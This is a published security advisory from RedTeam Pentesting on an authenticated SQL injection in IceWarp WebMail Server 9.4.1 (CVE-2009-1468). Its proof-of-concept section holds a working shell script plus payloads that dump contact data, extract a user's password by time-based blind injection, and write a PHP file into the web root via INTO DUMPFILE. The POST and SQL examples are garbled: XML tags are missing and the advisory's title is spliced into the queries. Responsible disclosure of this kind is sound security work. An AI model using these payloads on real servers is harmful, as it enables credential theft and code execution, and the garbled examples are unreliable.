Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to execute arbitrary SQL SELECT statements and
therefore read any data from the DBMS that are accessible by the Icewarp
eMail Server.
### Details
- Product: IceWarp eMail Server / WebMail Server
- Affected Versions: 9.4.1
- Fixed Versions: 9.4.2
- Vulnerability Type: SQL Injection
- Security Risk: high
- Vendor URL: `http://www.icewarp.com/`
- Vendor Status: notified, fixed version released
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2009-003`
- Advisory Status: published
- CVE: CVE-2009-1468
- CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1468`
### Introduction
"Feature complete yet easy to use, WebMail Server Pro provides feature
rich Web 2.0 web-based access to email, calendars, contacts, files and
shared data from any computer with browser and internet connection,
without the usual configuration hassle. Thanks to advanced technologies
and application-like look and feel, Pro suggests it was born to become
the ultimate replacement of Outlook and similar desktop mail clients."
(from the vendor's homepage)
### More Details
The IceWarp eMail Server's web-based groupware component provides
functionality for users to store, for example, contact information,
notes, a journal or files. A search form can be used to search for such
stored items.
When users search, for example, for certain files, using the provided
search form, an HTTP POST request containing the search query in XML
form is sent from the browser to the PHP script at
`https://example.com/webmail/server/webmail.php`:
```
-
[..]
0
60
EVNTYPE asc
(EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR
EVNNOTE LIKE '%SQL INJECTION TEST%')
```
It is evident that SQL expressions are used to find matching items and
order the results. Using the information provided within the POST
request, two SQL queries are constructed and executed on the database
(relevant user-controlled parts marked with a leading "\>"):
```
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
evnstarttime, evntype, evncolor, evncomplete
From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
(
> (EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR
> EVNNOTE LIKE '%SQL INJECTION TEST%')
) AND
evnclass <> 'O'
) And
(EvnFolder='Files')
Order By
> EVNLOCATION asc
LIMIT 0,45
```
```
Select Count(EVN_ID) As Count_ From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
> (EVNIceWarp WebMail Server: SQL Injection in Groupware Component LIKE '%SQL INJECTION TEST%' OR
> EVNNOTE LIKE '%SQL INJECTION TEST%')
) And
(EvnFolder='Files')
```
Data is only returned from the database to the web application when both
queries are syntactically correct. Due to a different nesting level of
parentheses around the SQL queries' user-manipulable parts, successful
(non-blind) SQL injection requires the use of two elements within the
original HTTP POST request.
The following examples show the two queries that are executed when the
\ element contains the string "0=1) /\* " and the \ element
contains the string "\*/)--". User input that is active within an SQL
query is marked with a "\>", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "\|":
```
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
evnstarttime, evntype, evncolor, evncomplete
From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
(
> 0=1)
+ /* part of the element
| ) AND
| evnclass <> 'O'
| ) And
| (EvnFolder='Files') Order By
+ part of the element */
> )--
LIMIT 0,45
```
```
Select Count(EVN_ID) As Count_ From Event Where
(EVNGRP_ID = '3a7e072a3002') And
(
> 0=1)
+ /* part of the element
| ) And
| (EvnFolder='Files')
```
Note that this method requires a DBMS that allows unbalanced C-style
(/\*\*/) comments in its SQL syntax, such as SQLite3 or MySQL \< 5.0.51.
For other DBMS, blind SQL injection into the first SQL query is another
option.
### Proof of Concept
The following shell script can be used to construct a valid search
request as mentioned above. It expects a valid session ID and
corresponding username as commandline arguments, followed by arguments
that are inserted into the \ and \ elements of the POST
request.
```
#!/bin/sh
sid=$1
uid=$2
orderby=$3
if [ -n "$4" ] ; then
sql=$4
else
sql="1=0)/*"
fi
curl --silent -d '
-
'"$orderby"'
'"$sql"'
' https://example.com/webmail/server/webmail.php | \
perl -pe 's/{/\n/g' | grep "result::" | \
sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'
```
For DBMS that support unbalanced C-Style comments, data can for example
be retrieved from the database as follows:
\$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 "\*/) UNION SELECT random(),'NULL',
('result::'\|\|ItmSurname) FROM ContactItem"
Joe:Plumber
John:Doe
Agent:Smith
Jane:Doe
Joe:User
For other DBMS, blind SQL injection is a possibility. The following
example illustrates how a password for a certain user account is
retrieved on an installation of the IceWarp eMail server that uses a
recent version of MySQL for storing user account information:
\$ time ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 "" "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'a%'),SLEEP(5),1)-- "
real 0m0.334s
user 0m0.053s
sys 0m0.007s
\[...\]
\$ time ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user@example.com "" "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 't%'),SLEEP(5),1)-- "
real 0m5.441s
user 0m0.037s
sys 0m0.013s
\[...\]
\$ time ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 "" "1=0)) UNION SELECT 1,2,IF((SELECT COUNT(\*) FROM users
WHERE U_Mailbox='user' AND U_Password LIKE 'test'),SLEEP(5),1)-- "
real 0m5.418s
user 0m0.040s
sys 0m0.010s
Depending on the DBMS configuration, creation of arbitrary files and/or
code execution might also be possible. The following example illustrates
the creation of a PHP script within the web application's root directory
using the SELECT .. INTO DUMPFILE functionality provided by MySQL:
\$ ./sql_inject.sh a3779402b23fa4acdcba6be907521acb "" "1=0)) UNION SELECT '','','<?php phpinfo();?>'
INTO DUMPFILE 'c:/Program Files/Merak/html/webmail/phpinfo.php'-- "
### Workaround
None.
### Fix
Upgrade to version 9.4.2.
### Security Risk
The risk of this vulnerability is estimated as high. Depending on the
IceWarp eMail Server configuration, and configuration of the DBMS used,
attackers authenticated to the web application can leverage it to
retrieve, for example, users' contacts, notes or journal entries, obtain
user credentials, and/or execute arbitrary code.
### History
- 2009-03-23 Vulnerabilities identified during a penetration test
- 2009-04-01 Meeting with customer and vendor
- 2009-04-28 CVE number assigned
- 2009-05-05 Vendor publishes fixed version
- 2009-05-05 Advisory released
### RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
`https://www.redteam-pentesting.de`.